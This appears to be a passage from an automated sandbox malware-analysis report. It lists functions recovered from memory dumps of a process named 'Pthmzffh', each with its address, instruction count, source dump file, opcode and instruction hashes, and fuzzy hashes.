                                                                      • Opcode ID: 16f55a7465571c536dbf9c5f4066e3396dfa2d27beb9312ca0be2ef53b0fff34
                                                                      • Instruction ID: 245c31ffbcfe0f47955b01f638e73bcbcc221359b7678a3d56733a6260fd8381
                                                                      • Opcode Fuzzy Hash: 16f55a7465571c536dbf9c5f4066e3396dfa2d27beb9312ca0be2ef53b0fff34
                                                                      • Instruction Fuzzy Hash: D371F4307061098FAB35AABC8854A7E73A6AFC5574711847AD912CF3A4EF31CC82B353
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C719921 Relevance: 1.6, Strings: 1, Instructions: 331COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d
                                                                      • API String ID: 0-2564639436
                                                                      • Opcode ID: a9990200ffb1ee90f1591fabdf41b73950e0a3fbc141ee1f865478497b348c0d
                                                                      • Instruction ID: 4d8a796c0351f3ac5e43ab3cd0c5d25d9f302c8b126948defa415e6f96b42132
                                                                      • Opcode Fuzzy Hash: a9990200ffb1ee90f1591fabdf41b73950e0a3fbc141ee1f865478497b348c0d
                                                                      • Instruction Fuzzy Hash: EDE12A74A0021ECFCF14DF98D8908EDB7B2FF89304B518965D905AB265DB74E986CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71AAC0 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: A
                                                                      • API String ID: 0-3554254475
                                                                      • Opcode ID: b145f590304822cc50238ed33ddb262d3b021020c67105b4eaa8b76dab8e01a1
                                                                      • Instruction ID: adcf01a51a40a6e09dee466eb146b5f9c7ba379da22e2b7cc5383f960a09d0ba
                                                                      • Opcode Fuzzy Hash: b145f590304822cc50238ed33ddb262d3b021020c67105b4eaa8b76dab8e01a1
                                                                      • Instruction Fuzzy Hash: FB2136B8E4124B8FDF60CB78E8824FE7BF2EB46320F455568C406DB191DB7846479B80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F2CC8 Relevance: .3, Instructions: 337COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c25e7daebc253a4afd002a95aeb605a7822d8cc41f8b5a97c61aa943ff459cf7
                                                                      • Instruction ID: 1ce886c76bad05c773f761db56150e699b8f9fecf4d956dcc96dee65ead18e29
                                                                      • Opcode Fuzzy Hash: c25e7daebc253a4afd002a95aeb605a7822d8cc41f8b5a97c61aa943ff459cf7
                                                                      • Instruction Fuzzy Hash: A5C1A379B001199FDB09EF64D8A0AAE77B7FF88300F558429D902AB358DB35DC46CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5FAC28 Relevance: .3, Instructions: 280COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 888eda19c73c3250cc03d7de6b19029e6270ce1bd518f864a973d60873814552
                                                                      • Instruction ID: 9acb0cf97ba9f2cf2a4d04d900c26a04d5303b5f93db5e5f88018d7a1824b752
                                                                      • Opcode Fuzzy Hash: 888eda19c73c3250cc03d7de6b19029e6270ce1bd518f864a973d60873814552
                                                                      • Instruction Fuzzy Hash: 8DA1B039B012049FCB19CF69D494AADBBB2FF89311F248066EA15DB391CB34CD02DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F6CA0 Relevance: .2, Instructions: 207COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b39e75925c091f5f790426071a36aa45cc8ec8ec0dc814b6015ae0a3d5e80440
                                                                      • Instruction ID: 51955fa00da3173eba3ad9b6e197c7c29beee67bbb0866e79c53a6947f0880e0
                                                                      • Opcode Fuzzy Hash: b39e75925c091f5f790426071a36aa45cc8ec8ec0dc814b6015ae0a3d5e80440
                                                                      • Instruction Fuzzy Hash: 5F719279B001099FCB18EFA8D591AAFB7F6FB89310F148469E505EB354CB309C06CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5FA8B8 Relevance: .2, Instructions: 163COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80ea32da22e4f2a6b1df9e9bec5f5e51721d1f8fde7484b2b658162ba1df0525
                                                                      • Instruction ID: 5cd6e5844ef61992ec73e6a7c9bc2ef324d5b7164608bad1adf0131ff351459e
                                                                      • Opcode Fuzzy Hash: 80ea32da22e4f2a6b1df9e9bec5f5e51721d1f8fde7484b2b658162ba1df0525
                                                                      • Instruction Fuzzy Hash: 48514935B0020A8FCB15CF98C4809AAF7B5FF86324B1687A5D659DB242D730EC56DBD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F9870 Relevance: .2, Instructions: 159COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2e8913b8414b437942f3cba89e1a281a86f2a1abe1540ad6d9c0177023b4ab4
                                                                      • Instruction ID: a38da09e1ddd132c1b8dae5eb2cd2e7aa3e697bd652e4c242be69fd6e56b5025
                                                                      • Opcode Fuzzy Hash: f2e8913b8414b437942f3cba89e1a281a86f2a1abe1540ad6d9c0177023b4ab4
                                                                      • Instruction Fuzzy Hash: 13517F76600004AFCB499FA8CD54D69BBB7FF8D31471684A4E2098F276CB32DC62EB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71FD68 Relevance: .2, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0315a79b8b99f17bf869ba24e33b4dbf75ff93483f0baf54c43b635c3e7734df
                                                                      • Instruction ID: 84b169b73530b0ff193ab28ddfdf6bc7ed3e80519be576f2318eadb28e3c6161
                                                                      • Opcode Fuzzy Hash: 0315a79b8b99f17bf869ba24e33b4dbf75ff93483f0baf54c43b635c3e7734df
                                                                      • Instruction Fuzzy Hash: E651DC71E0050A8FCB14DFECD8945BEBBB5FB81310F24866AD919EB242D3309A46CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013AD310 Relevance: .2, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d018a000770e526912a03eae6c0ec0d239db5a0a8e1ab79457f3cdd7d9ce413a
                                                                      • Instruction ID: df801c4b6c1ecaa2f2fa72165fb672cd05c4bd9ce728f8d05d9289c6c106d85d
                                                                      • Opcode Fuzzy Hash: d018a000770e526912a03eae6c0ec0d239db5a0a8e1ab79457f3cdd7d9ce413a
                                                                      • Instruction Fuzzy Hash: 35513475E0021A8FCB04DFD8C8809EEFBB6FB98314F55816AD516BBB41D734A941CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F6C90 Relevance: .1, Instructions: 144COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f33c64e2f459feaaf531c4530fec35b18302ba2c27c8c5f647c4fb69c70dbfe
                                                                      • Instruction ID: 53411b0c10646774147f7eaf780b42bda0c9ba5e7e22c28d8177777f6ac0c81a
                                                                      • Opcode Fuzzy Hash: 6f33c64e2f459feaaf531c4530fec35b18302ba2c27c8c5f647c4fb69c70dbfe
                                                                      • Instruction Fuzzy Hash: 39517575B00109DFDB18EFA8D991AAFB7B6FB88300F248529E515E7354DB309C46CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5FA288 Relevance: .1, Instructions: 139COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f169ff06eaeb113e9f75741f8b12974cbd8b1c13fc5fd096ad32551713f411a9
                                                                      • Instruction ID: a6656fa14175c280fff91f2707117a2baeccc0acdd87689095435689d2be4b91
                                                                      • Opcode Fuzzy Hash: f169ff06eaeb113e9f75741f8b12974cbd8b1c13fc5fd096ad32551713f411a9
                                                                      • Instruction Fuzzy Hash: 4F51F2343047448FD738DFA5C49039A7BE6EF85314F248A2DC55A8B6E1DBB4D846CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F2CC6 Relevance: .1, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 54477bfa1a250fc910191347b487d7b3601b7e5e5756ee6618c88597bc05194f
                                                                      • Instruction ID: f4ec40df3444151e343a1acf77ad7f5cc8ef589ec670e909e4b3c21011c77270
                                                                      • Opcode Fuzzy Hash: 54477bfa1a250fc910191347b487d7b3601b7e5e5756ee6618c88597bc05194f
                                                                      • Instruction Fuzzy Hash: A6514479A05119EFCF08DF94D8909AEB7B6FB88314F104519DA02EB349DB359D07CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F9D10 Relevance: .1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4291b43822e8aa5b57d270382c200194fc39529ab1c85340b5e0099e7bb16aca
                                                                      • Instruction ID: f67e0b768fbc2db734373a6148a6698a84b1f09b820e73a03ed127250a8cc963
                                                                      • Opcode Fuzzy Hash: 4291b43822e8aa5b57d270382c200194fc39529ab1c85340b5e0099e7bb16aca
                                                                      • Instruction Fuzzy Hash: 5E315A353001145FCB189F69D880AAE7BABEFC9225B14843AEA09CF350DF31CC02D7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5FB510 Relevance: .1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8ff42367400a706f3d2acc42b6a6a80940d9e9e1400ba966bff5990e973ff552
                                                                      • Instruction ID: e0f93fa23fe5344598cad3de30b430c78516bfb8d5cbfdbe9f1af83a2ca8f183
                                                                      • Opcode Fuzzy Hash: 8ff42367400a706f3d2acc42b6a6a80940d9e9e1400ba966bff5990e973ff552
                                                                      • Instruction Fuzzy Hash: CC41D179B04219CFCB19CF6AD8846BEB7B2FF88344F108626DA11D7255E734D902CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F0618 Relevance: .1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 893127f8fc2b189db46582c3d151a95ffb7652d10962a1cfaf719ea7b2146f09
                                                                      • Instruction ID: d62ad6612a27c42d204a50f160f6b2f2cc59bce614aac2565bc12b5412ed82ff
                                                                      • Opcode Fuzzy Hash: 893127f8fc2b189db46582c3d151a95ffb7652d10962a1cfaf719ea7b2146f09
                                                                      • Instruction Fuzzy Hash: D831F678B002089FCB08DF59C580EAE77E6FB8C214F258595E605AB3A5D731ED128FA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5FC434 Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12cd54900492650d3e800b3abed1c49a1b818f14246dca0747b3d0788e19270c
                                                                      • Instruction ID: a01a34f99d4792864930e75e8722dafa3b5f609df1b8ed4fc557b95c7eae5444
                                                                      • Opcode Fuzzy Hash: 12cd54900492650d3e800b3abed1c49a1b818f14246dca0747b3d0788e19270c
                                                                      • Instruction Fuzzy Hash: 2E410A38B012188FEB68DF15D880F9977B1BF48320F1045E5EA09AB391DA30ED85CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71D430 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 639376dd0c756701e18f6173124d929a1324aaafa5cc647613333a61a5461287
                                                                      • Instruction ID: 9dcec23c632308de732f044911041a0fb162a6080a89b14739437ed1c63ccf89
                                                                      • Opcode Fuzzy Hash: 639376dd0c756701e18f6173124d929a1324aaafa5cc647613333a61a5461287
                                                                      • Instruction Fuzzy Hash: 642136317050289F9B36B6EDA46067F7296E7E8A647118529CC1FCB348CA28BC410BD2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F2B50 Relevance: .1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2f52575a942e34fb874f29f6edb1bd1e75e30fb0bfd075dcf7f13ad01dbab6aa
                                                                      • Instruction ID: 892b31e0df447ce5ab77236371cb7abb3587955f8cfcbf0b886d3f6aee6d3561
                                                                      • Opcode Fuzzy Hash: 2f52575a942e34fb874f29f6edb1bd1e75e30fb0bfd075dcf7f13ad01dbab6aa
                                                                      • Instruction Fuzzy Hash: B521A4BD7081079BE75C6E5D9C217BF3297FBD4225F28882ADE06CB288DE3498439751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71F671 Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7e30583e4fd66963e607a03b9c2813a40fd48f6f47b9b9014c4cf1f4c1699d95
                                                                      • Instruction ID: 0665b246870afc2a2d6ded844ea316fe63fea8b33f9b8338d264e980c1c44f00
                                                                      • Opcode Fuzzy Hash: 7e30583e4fd66963e607a03b9c2813a40fd48f6f47b9b9014c4cf1f4c1699d95
                                                                      • Instruction Fuzzy Hash: 9F2138393411246FE70877B8A87867EB697FFC9214714882DED06DB384CE399C0747A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5FB500 Relevance: .1, Instructions: 80COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 212797089e0d24511bc441d98c44d3f781385e9c7a17f999df670205497c2b5b
                                                                      • Instruction ID: 3a4b624a9e72563974d1c41f15a9401691fef52cf95042ca0546d9ade308039c
                                                                      • Opcode Fuzzy Hash: 212797089e0d24511bc441d98c44d3f781385e9c7a17f999df670205497c2b5b
                                                                      • Instruction Fuzzy Hash: 1F21B479B04219CFCF15DF69D8905AEBBB2FF88348F014629DA0197315E734D802CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F95A0 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1dbab0112401e3efbb96e64650883200d21e8de0ae1a06571cd8e69b24ca3e39
                                                                      • Instruction ID: 4154a4edcc4017acd0930d404163621a8315c0dfb25dd5519015acfa80eddfaa
                                                                      • Opcode Fuzzy Hash: 1dbab0112401e3efbb96e64650883200d21e8de0ae1a06571cd8e69b24ca3e39
                                                                      • Instruction Fuzzy Hash: EB21D3707002019FDB54EBA9D4853EE7BABFB89315F044C39E40AD7A41DFB8990697E4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F9C10 Relevance: .1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e6c56b1d85180b7a01bd4450a9891e9c393d344dee91bc1169250dd6385f8aee
                                                                      • Instruction ID: 910d1f3e50af6a2c25377b2372bc39d2b384b58a1e4b91aa81e47a0f3f6588db
                                                                      • Opcode Fuzzy Hash: e6c56b1d85180b7a01bd4450a9891e9c393d344dee91bc1169250dd6385f8aee
                                                                      • Instruction Fuzzy Hash: 4C215335A00149DFCB15CFA8C894ADE7FB6FB8D321F18552AE915B7390CA719842DF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71D420 Relevance: .1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f855049e15d0f270bd25a0a23efacb679f4872f0314ad945e0babc8e10400dbc
                                                                      • Instruction ID: 335962c8501648ba3fb7c7d056521104ae90477ac819987c207b09c1e6fbc6a2
                                                                      • Opcode Fuzzy Hash: f855049e15d0f270bd25a0a23efacb679f4872f0314ad945e0babc8e10400dbc
                                                                      • Instruction Fuzzy Hash: 2F1175713091259FD737A6AE906017F3356E7E5964715C419CC27CB348C6286C034FD2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013A0567 Relevance: .1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0814fa058c886133adfb08005290842141f8227d392ed5f65b43796d79220b42
                                                                      • Instruction ID: a3b094eac60af7d7c782366b383aa394c158e6aa4ac582a6858d80b0bfca0aa3
                                                                      • Opcode Fuzzy Hash: 0814fa058c886133adfb08005290842141f8227d392ed5f65b43796d79220b42
                                                                      • Instruction Fuzzy Hash: 3021EF34E10208CFCB44DFA8E4889EDBBB1FF49314B51916AE906AB765DB34A901CF15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C719E40 Relevance: .1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2255146d2e6315eaade11f8ba21b3740369103600a868d92e49e3dbf38ad281d
                                                                      • Instruction ID: 4f94526179fc2223fdaa2850995aef9366e0a5bc4c8321c3fcaa0b84e0bd42c9
                                                                      • Opcode Fuzzy Hash: 2255146d2e6315eaade11f8ba21b3740369103600a868d92e49e3dbf38ad281d
                                                                      • Instruction Fuzzy Hash: 7311B4313057414FD311DB78C891896BBEBEBD72243258AADD1B98B7A2DB21A807C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5FAA50 Relevance: .1, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e99cc4fe780054d8fe9eabaa8969c32f64cb9858eec8f04883922792a803f5e2
                                                                      • Instruction ID: 8545dd6a9f11ae6d5e89949a40e3125f82e9db9a052d06f83921bf1c56dd2a8b
                                                                      • Opcode Fuzzy Hash: e99cc4fe780054d8fe9eabaa8969c32f64cb9858eec8f04883922792a803f5e2
                                                                      • Instruction Fuzzy Hash: 3511B234B002059FDF648F6D89807AE7BF6FB89711F14452AEA49D7380EB71C942A7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71AAF0 Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 269c5832580c026032bf406aff16fb0d2948039b7cf59d332ad68f236d522762
                                                                      • Instruction ID: 606425e0e1403f575d48d20ce9525a0528c3fbbe4b5f0d12b9b4f9796c48061d
                                                                      • Opcode Fuzzy Hash: 269c5832580c026032bf406aff16fb0d2948039b7cf59d332ad68f236d522762
                                                                      • Instruction Fuzzy Hash: 50119178E1124F9BCF50DFA9E4814BEB7F2EB44320F506825C812E7240EB749A419B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013A0578 Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a53a57fb0538aa7f01a5929ea5a361cd2d722cb21ca603f89b95ba8eb1ba1b7f
                                                                      • Instruction ID: 5fa56617e3988aa47b49d17df62ba04ae678d500d2ef120c88fe725490f15992
                                                                      • Opcode Fuzzy Hash: a53a57fb0538aa7f01a5929ea5a361cd2d722cb21ca603f89b95ba8eb1ba1b7f
                                                                      • Instruction Fuzzy Hash: E321F334A00208CFCB44DFA8D4989ADBBB1FF4A304F50916AE905A7360DB30A901CF55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5FAC18 Relevance: .1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
